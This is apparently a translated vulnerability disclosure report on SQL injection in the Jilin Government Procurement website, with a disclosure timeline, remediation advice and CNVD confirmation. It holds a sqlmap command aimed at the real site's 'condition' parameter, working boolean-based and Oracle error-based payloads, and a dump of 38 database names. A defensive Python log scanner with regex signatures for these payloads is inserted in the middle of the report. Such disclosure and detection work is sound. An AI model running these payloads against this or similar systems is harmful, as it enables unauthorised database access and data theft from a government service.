2014-04-28: Details reported to the vendor, awaiting vendor handling
2014-05-02: Vendor confirmed; details disclosed to the vendor only
2014-05-12: Details disclosed to core white hats and relevant domain experts
2014-05-22: Details disclosed to regular white hats
2014-06-01: Details disclosed to intern white hats
2014-06-12: Details disclosed to the public

The Jilin Government Procurement website has a SQL injection vulnerability. Multiple sites on the same server use the same CMS, so they can be SQL-injected as well.
1. SQL injection point

sqlmap -u "www.ccgp-jilin.gov.cn/cgzxdtdetail.jsp?tablename=cgnr&condition=176868&articleid=10000245009" -p "condition" -b -v 2

Place: GET
Parameter: condition
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: tablename=cgnr&condition=176868' AND 3768=3768 AND 'qeIx'='qeIx&articleid=10000245009
    Vector: AND [INFERENCE]

    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: tablename=cgnr&condition=176868' AND 6881=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(103)||CHR(117)||CHR(109)||CHR(113)||(SELECT (CASE WHEN (6881=6881) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(117)||CHR(116)||CHR(114)||CHR(113)||CHR(62))) FROM DUAL) AND 'AUjh'='AUjh&articleid=10000245009
    Vector: AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'),'#','[HASH_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
---
web application technology: Servlet 2.5, JSP, JSP 2.1
back-end DBMS: Oracle
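The two payload shapes sqlmap reported above (a quoted tautology for the boolean-based blind case, and an Oracle XMLType/CHR() subquery for the error-based case) are easy to spot in web-server access logs. The following is an added detection example written for this report, not code from the original post or the affected site; the access-log lines are constructed samples in Tomcat common log format, and the signatures are derived only from the payloads shown above.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (not from the report). The first two carry
# the boolean-based and error-based payload shapes sqlmap reported for the
# "condition" parameter; the third is a benign request to the same page.
SAMPLE_LOG = """\
10.0.0.5 - - [28/Apr/2014:10:00:01 +0800] "GET /cgzxdtdetail.jsp?tablename=cgnr&condition=176868%27%20AND%203768%3D3768%20AND%20%27qeIx%27%3D%27qeIx&articleid=10000245009 HTTP/1.1" 200 5120
10.0.0.5 - - [28/Apr/2014:10:00:02 +0800] "GET /cgzxdtdetail.jsp?tablename=cgnr&condition=176868%27%20AND%206881%3D(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)))%20FROM%20DUAL)%20AND%20%27AUjh%27%3D%27AUjh&articleid=10000245009 HTTP/1.1" 500 812
10.0.0.9 - - [28/Apr/2014:10:00:03 +0800] "GET /cgzxdtdetail.jsp?tablename=cgnr&condition=176868&articleid=10000245009 HTTP/1.1" 200 5120
"""

# Common log format: ip ident user [timestamp] "METHOD uri PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) \S+" (?P<status>\d{3})'
)

# Signatures derived from the payload shapes in the sqlmap output above.
SIGNATURES = {
    # 176868' AND 3768=3768 AND 'qeIx'='qeIx  -> quoted numeric tautology
    "boolean-based blind": re.compile(r"'\s*AND\s+\d+\s*=\s*\d+\s+AND\s*'", re.I),
    # UPPER(XMLType(CHR(60)||...)) -> Oracle error-based marker construction
    "oracle error-based (XMLType)": re.compile(r"XMLType\s*\(.*CHR\s*\(", re.I | re.S),
    # any SELECT ... FROM DUAL inside a parameter value
    "oracle subquery": re.compile(r"\bFROM\s+DUAL\b", re.I),
}

def scan_line(line):
    """Return a list of (parameter, signature) findings for one log line."""
    m = LOG_RE.match(line)
    if not m:
        return []
    findings = []
    query = urlsplit(m.group("uri")).query
    # parse_qsl percent-decodes each value, so the regexes see the raw payload.
    for name, value in parse_qsl(query, keep_blank_values=True):
        for sig, pattern in SIGNATURES.items():
            if pattern.search(value):
                findings.append((name, sig))
    return findings

def scan_log(text):
    """Map each flagged line number (1-based) to its findings."""
    report = {}
    for n, line in enumerate(text.splitlines(), 1):
        hits = scan_line(line)
        if hits:
            report[n] = hits
    return report
```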
2. Database names

available databases [38]:
[*] AGENCY
[*] CMSAPP
[*] CPMS
[*] CTXSYS
[*] DBSNMP
[*] DF
[*] DMSYS
[*] EXFSYS
[*] EXPERT
[*] EXPERT_EPS
[*] EXPERT_EPS_TEST
[*] EXPERT_EPS_V2
[*] EXPERT_EPS_V3
[*] EXPERT_EPS_ZJ
[*] EXPERT_R1
[*] EXPERT_TEST
[*] MM
[*] OA
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PERFSTAT
[*] SERSUB
[*] SMS
[*] SSADMIN
[*] SUREKAM
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TRSWCM65
[*] TRSWCM65PLUG
[*] TSMSYS
[*] TURBOCMS
[*] U1
[*] WCM
[*] WMSYS
[*] XDB
3. Database password hashes
database management system users password hashes:
1. Fix the injection point
2. If this system is no longer in use, shut down the service
Severity: High
Vulnerability Rank: 13
Confirmation time: 2014-05-02 21:27
CNVD confirmed and reproduced the described situation and forwarded it via CNCERT to the Jilin branch center for handling; scored as an information disclosure risk, rank 13
None yet